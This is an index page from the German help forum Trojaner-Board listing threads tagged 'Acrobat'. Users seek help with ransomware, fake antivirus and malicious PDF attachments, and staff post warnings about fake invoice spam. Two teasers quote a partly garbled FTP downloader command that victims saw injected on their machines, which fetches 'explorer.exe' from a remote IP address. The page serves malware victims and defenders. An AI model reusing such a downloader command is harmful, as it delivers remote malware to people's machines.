Zurück   Trojaner-Board > Themen

Alles zum Thema: Acrobat

  Letzter Beitrag Antworten Hits Forum
Bundespolizei Trojaner WIN7 64bit mit FRST Log
Acrobat - Hey Leute, habe mir gerade diesen GVU Trojaner eingefangen und konnte nicht in den Abgesicherten Modus. Habe FRST schon durchlaufen lassen. €: Mach es natürlich gerne nochmal mit diesem OTL, wollte nur etwas Vorarbeit leisten ;) Hier die Logfile: Scan result of Farbar Recovery Scan...
Plagegeister aller Art und deren Bekämpfung
GVU Trojaner eingefangen
Acrobat - Liebe Experten, ich habe mir heute im Internet offenbar einen GVU Trojaner eingefangen und möchte Euch um Hilfe bei der Diagnose und Bereinigung bitten. Dem bekannten Sperrbildschirm ging dabei zunächst eine Information über veraltetes Java voraus, dann öffnete sich kurz Acrobat und es kam eine...
Log-Analyse und Auswertung
Programme werden nicht mehr ausgeführt, Installationen laufen nicht...
Acrobat - Hallo zusammen! Ich wende mich an euch, da ich folgendes Problem habe (alles Win7 Home Premium): Ich habe gestern versucht, skype zu starten. Das Programm bricht noch vor dem einloggen ab ("Kann nicht gestartet werden. Es wird online nach einer Lösung gesucht.."). Danach dasselbe mit ICQ. Die...
Log-Analyse und Auswertung
1&1 Telecom GmbH Spam: Ihre Rechnung vom 05.04.2013
Acrobat - 1&1 Telecom GmbH - Ihre Rechnung 756779881568 vom 05.04.2013 Wer eine Mail mit dem Betreff "1&1 Telecom GmbH - Ihre Rechnung 756779881568 vom 05.04.2013" erhält, sollte diese an uns weiterleiten. (Nummern können varieren) Von: "Rechnungsstelle 1&1 Telecom GmbH"...
Diskussionsforum
Ungewollt verlinkt und habe Ad, trotz Ad-Blocker + Bitdefender Internet Security, Laptop lahmer
Acrobat - Hallo liebe Anti-Schädlings-Gemeinde! Seit einigen Wochen glaube ich mir ein Schädling eingefangen zu haben. Ich werde wenn ich wie gewöhnlich durch das Internet surfe auf Seiten verlinkt, es sind meist mehrere in Folge die nicht bis zum Ende aufgerufen werden, sondern eine Reihe von und...
Plagegeister aller Art und deren Bekämpfung
flugladen.de Spam: E-Ticket Intl. Apt.
Acrobat - flugladen.de Spam: E-Ticket Intl. Apt. Referenznummer8934775981 Wer eine Mail mit dem Betreff "E-Ticket Intl. Apt. Referenznummer 4784342048" erhält, sollte diese an uns weiterleiten. From: <noreply@flugladen.de> (gefälschter Absender) Subject: E-Ticket Intl. Apt. Referenznummer...
Diskussionsforum
Systemwiederherstellungspunkte verschwunden nach "Scanhost.exe – Corrupt Disk“ System Repair Trojaner
Acrobat - Hi, Ich bin zurzeit auf Geschäftsreise weit weit weg von zu Hause und habe daher nicht meine gewohnten Tools etc. Ich benötige mein Notebook extrem dringend. Ich bin Softwareentwickler und würde mich als absoluten Computerprofi bezeichnen. Gestern hatte ich plötzlich einen „Scanhost.exe –...
Log-Analyse und Auswertung
Telekom Spam: RechnungOnline Monat Februar 2013 Buchungskonto
Acrobat - RechnungOnline Monat Februar 2013 (Buchungskonto: 52978332109) Wer eine Mail mit dem Betreff "RechnungOnline Monat Februar 2013 (Buchungskonto: 52978332109)" erhält, sollte diese an uns weiterleiten. (Nummern können evtl. varieren) From: <rechnungonline4@telekom.de> (gefälschter...
Diskussionsforum
Disk Antivirus Professional und plötzlich jede Menge Infektionen
Acrobat - Hallo zusammen! Heute morgen hab ich plötzlich Disk Antivirus Professional auf meinem Netbook und bekomme ständig Meldungen über Infektionen! Nach einem Quick Scan Malewarebytes mit einigen Funden (z.B.0Acess) scheint jetzt alles wieder zu funktionieren. Disk Antivirus Prof. ist aber dennoch...
Plagegeister aller Art und deren Bekämpfung
Adobe Reader Xl für Win. Vista nicht verfügbar!
Acrobat - Seit einiger Zeit erhalte ich beim Update Check den Hinweis, das meine installierte Version des Adobe Reader X Vers. 10.1.4 bzw. Adobe Acrobat 10.1.5.33 aktualisiert werden müsste ...geht aber nicht bei Win. Vista -32 Bit. Jeder Versuch zum Update endet wieder bei der Installation der Version X....
Diskussionsforum
Trojan.Pidief - PDF versehentlich Aufgemacht - Infiziert oder nicht ?
Acrobat - So - nu hat es mich auch erwischt... :headbang: Da ich mal nachschauen wollte ob die Telekom denn nun auch brav die "Highspeed" Option in meinem Vertrag deaktiviert hat habe ich bei der letzten eMail mit der Rechnung das PDF aufgemacht... Es gab eine Fehlermeldung dass ein Font nicht...
Plagegeister aller Art und deren Bekämpfung
F:\Sonstige Dateien_Anwendungen\Acrobat 9.0\Adobe.Acrobat.9.0.Pro.Extended.Keymaker.Only-EDGE\keygen.exe (Trojan.Agent)
Acrobat - Hallo Zusammen, G Data Total Protection (abgelaufene Testversion) hat mir heute folgende Meldung angezeigt: Virus: HTML:Bankfraud-CW (Engine B) Der Leerlauf-Scan hat eine infizierte Datei gefunden. Datei: Inbox Verzeichnis:...
Plagegeister aller Art und deren Bekämpfung
Google-Link und andere Probleme!
Acrobat - Hallo, Ich weiß ich hab leider noch ein Thread offen, wo ich leider nicht weitergemacht hab. Ich bereue es eh schon jetzt :headbang:. Wie auch immer, ich hab nun wieder ein Problem, dass z.B wenn ich auf ein Google-Link klicke ich irgendwo hingeleitet werde aber nicht auf die Seite, wo ich...
Plagegeister aller Art und deren Bekämpfung
Fehler in Security Check version 0.99.56
Acrobat - Ich hoffe, dieses Unterforum ist richtig. Security Check version 0.99.56 gibt folgendes Resultat aus, obwohl der Acrobat Reader brandneu und nicht Version 8 ist. Results of screen317's Security Check version 0.99.56 Windows Vista Service Pack 2 x86 (UAC is enabled) Internet Explorer...
Log-Analyse und Auswertung
trial version von Trojanhunter hat 3 trojaner gefunden
Acrobat - Obwohl es schon sehr spät ist erbitte ich Hilfe. Weil mein Pc immer wieder nicht aus Mausklicks reagiert bzw. bei geöffnetem 2. Fenster der Text darunter reagiert habe ich mir diverse Virenscanner runtergeladen und laufen lassen. Nun hat Trojanhunter folgendes gefunden: Found trojan file:...
Plagegeister aller Art und deren Bekämpfung
Fake Vodafone Rechnung PDF geöffnet. Trojaner?
Acrobat - Hallo, ich weiß leider nicht was mit mir los war heute, als ich von Vodafone eine Rechnungs E-Mail mit PDF Anhang bekommen habe und diese PDF Datei auch noch geöffnet habe (bin tatsächlich Vodafone Kunde). Da dort kein vernünftiger Inhalt drin war, habe ich die Datei bei virustotal.com...
Plagegeister aller Art und deren Bekämpfung
Starke CPU Schwankungen Log
Acrobat - Hallo, würde mich freuen wenn Ihr diesen Log euch ansehen würdet. Gibt es was verdächtiges? Danke
Log-Analyse und Auswertung
Windows entwickelt merkwürdiges Eigenleben
Acrobat - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes als zu öffnenden Dateinamen selbstständig ein : "eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get...
Plagegeister aller Art und deren Bekämpfung
Falsche Vodafonemail - PDF-Anhang geöffnet
Acrobat - Hallo Fachleute, ich habe eine täuschend echt aussehende, aber leider dennoch gefakte Vodafone Mail mit namentlicher Ansprache bekommen und den pdf-Anhang GEÖFFNET :schrei:. Inhalt war Datensalat. In div. Foren habe ich gelesen, dass die Mail im Februar schon mal und nun wieder massenweise raus...
Plagegeister aller Art und deren Bekämpfung
Merkwürdiges Problem unter Windows XP
Acrobat - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes ein : "eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get explorer.exe .. eq 7echo quit .. eq 7ftp ßn ßsöeq...
Alles rund um Windows
Rechnung von 1und1 Telecom mit PDF Anhang
Acrobat - Habe per Mail eine Rechnung von 1und1 Telecom bekommen und etwas zu schnell den Anhang (PDF) geöffnet. Angezeigt wurde im Acrobat eine Warnmeldung wegen einer fehlenden Schrift und anschließend eine Grafik. Ein umfassender Check mit Malwarebytes brachte keine Funde. Kann es sich trotzdem um den...
Plagegeister aller Art und deren Bekämpfung
Live Security Platinum
Acrobat - Hallo, habe auch das Problem mit diesem Ding. Ich bin zurzeit im abgesicherten Modus mit Netzwerktreibern und habe eine Internetverbindung. Bevor ich hier mich gemeldet hatte, hatte ich einen Quickscan mit Malwarebytes gemacht gehabt, nur leider hat dies nichts gebracht. Nun habe ich...
Plagegeister aller Art und deren Bekämpfung
Virenscanner findet: EXP/CVE-2010-0840.HF, EXP/2012-1723.CY und EXP/Pidief.aew
Acrobat - Hallo zusammen, beim letzten Suchlauf hat Avira Free Antivirus die folgende Malware gefunden: EXP/CVE-2010-0840.HF, EXP/2012-1723.CY und EXP/Pidief.aew, ich habe sie in die Quarantäne verschoben. Folgendes habe ich bis jetzt gemacht: -Cache gelöscht -alte Java-Versionen gelöscht -Adobe...
Log-Analyse und Auswertung
Nach Live Security Platinum nun pup.downloadnsave
Acrobat - Liebes Board, habe durch ein gekauftes Internetspiel oder durch den Acrobat Reader den Live Security Platinum Rogue bekommen. Der ist nun dank Malwarebytes weg. Übrig bleiben 14 infizierte Objekte mit dem schauerlichen Namen pup.downloadnsave, bei denen malwarebytes machtlos ist und die auch nicht...
Log-Analyse und Auswertung
Ich habe den Bundestrojaner -.- Bekomme den nicht weg !
Acrobat - Jetzt bin ich befallen. Hab mein Laptop seit Nov'09 und bis jetzt hatte ich kein Virus -.- ich ärger mich total, da ich noch wichtige Uni-Blätter ausdrucken udn abschicken muss. Also der kam heute morgen. Davor hatte sich irgendein PDF Dokument geöffnet was aber leer war. Als ich Acrobat Reader per...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.